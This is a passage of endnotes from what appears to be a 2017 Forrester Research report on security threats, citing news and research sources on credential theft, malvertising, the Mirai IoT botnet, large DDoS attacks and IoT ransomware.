(http://techcrunch.com/2016/08/30/dropbox-employees-password-reuse-led-to-theft-of-
60m-user-credentials/).
"Back to text"
10. Source: Mike McDonnell, "Loyalty Fraud: A Rising Threat to Consumers and
Businesses," 1to1 Media blog, March 11, 2016 (http://www.1to1media.com/customer-
loyalty/loyalty-fraud-rising-threat-consumers-and-businesses).
"Back to text"
11. Source: "What Are Points & Miles Worth? November Monthly Valuations," The Points
Guy, November 2, 2016 (http://thepointsguy.com/2016/11/november-2016-monthly-
valuations).
"Back to text"
12. See the Forrester report " Vendor Landscape: Security User Behavior Analytics
(SUBA). "
"Back to text"
13. Source: Ken Thompson, "Reflections on trusting trust," ACM Digital Library, August 8,
1984 (http://dl.acm.org/citation.cfm?id=358210).
"Back to text"
14. Source: Jrme Segura, "Large Angler Malvertising Campaign Hits Top Publishers,"
Malwarebytes Labs, March 15, 2016 (http://blog.malwarebytes.com/threat-
analysis/2016/03/large-angler-malvertising-campaign-hits-top-publishers).
"Back to text"
15. Source: "Q3 State of the Internet / Security Report," Akamai
(http://content.akamai.com/pg7407-soti-security-report-q3-en.html).
"Back to text"
16. See the Forrester report " Secure Applications At The Speed Of DevOps. "
"Back to text"
17. Source: Brian Krebs, "Source Code for IoT Botnet Mirai' Released," Krebs on Security,
October 16, 2016 (https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-
released/).
"Back to text"
18. Source: Waqas Amir, "Akamai Kicks off Brian Krebs from its network after 665 Gbps
DDoS attack," HackRead, September 23, 2016 (http://www.hackread.com/brian-krebs-
665-gbps-ddos-attack-akamai/); Eduard Kovacs, "Hosting Provider OVH Hit by 1 Tbps
DDoS Attack," SecurityWeek, September 23, 2016
(http://www.securityweek.com/hosting-provider-ovh-hit-1-tbps-ddos-attack); Brian
Krebs, "Source Code for IoT Botnet Mirai' Released," Krebs on Security, October 16,
2016 (https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/);
Scott Hilton, "Dyn Analysis Summary Of Friday October 21 Attack," Dyn, October 26,
2016 (https://dyn.com/blog/dyn-analysis-summary-of-friday-october-21-attack/); Kevin
Beaumont, "Shadows Kill' Mirai DDoS botnet testing large scale attacks, sending
threatening messages about UK and attacking researchers," Medium, November 3, 2016
(https://medium.com/@networksecurity/shadows-kill-mirai-ddos-botnet-testing-large-
scale-attacks-sending-threatening-messages-about-6a61553d1c7#.3ief6l178); "Eir D1000
Wireless Router - WAN Side Remote Command Injection (Metasploit)," Exploit
Database, November 8, 2016 (https://www.exploit-db.com/exploits/40740/); Dan Goodin,
"Newly discovered router flaw being hammered by in-the-wild attacks," Ars Technica,
November 29, 2016 (http://arstechnica.com/security/2016/11/notorious-iot-botnets-
weaponize-new-flaw-found-in-millions-of-home-routers/); Graeme Burton, "TalkTalk
and Post Office routers downed in Mirai botnet attack," The Inquirer, December 2, 2016
(http://www.theinquirer.net/inquirer/news/2478916/talktalk-and-post-office-routers-
downed-in-mirai-botnet-attack); Liu Ya, "Now Mirai Has DGA Feature Built in,"
Network Security Research Lab at 360, December 9, 2016
(http://blog.netlab.360.com/new-mirai-variant-with-dga/); and Catalin Cimpanu,
"Security Firms Almost Brought Down Massive Mirai Botnet," BleepingComputer,
December 16, 2016 (http://www.bleepingcomputer.com/news/security/security-firms-
almost-brought-down-massive-mirai-botnet/).
"Back to text"
19. Source: John Leyden, "Sh... IoT just got real: Mirai botnet attacks targeting multiple
ISPs," The Register, December 2, 2016
(http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/).
"Back to text"
20. Source: Dan Goodin, "Brace yourselvessource code powering potent IoT DDoSes just
went public," Ars Technica, October 3, 2016
(http://arstechnica.com/security/2016/10/brace-yourselves-source-code-powering-potent-
iot-ddoses-just-went-public/).
"Back to text"
21. Source: Brian Krebs, "New Mirai Worm Knocks 900K Germans Offline," Krebs on
Security, November 16, 2016 (http://krebsonsecurity.com/2016/11/new-mirai-worm-
knocks-900k-germans-offline/).
"Back to text"
22. Source: Darlene Storm, "Hackers demonstrated first ransomware for IoT thermostats at
DEF CON," Computerworld, August 8, 2016
(http://www.computerworld.com/article/3105001/security/hackers-demonstrated-first-
ransomware-for-iot-thermostats-at-def-con.html).
"Back to text"
23. See the Forrester report " The IoT Attack Surface Transcends The Digital-Physical
Divide. "
"Back to text"
2017, Forrester Research, Inc. and/or its subsidiaries. All rights reserved.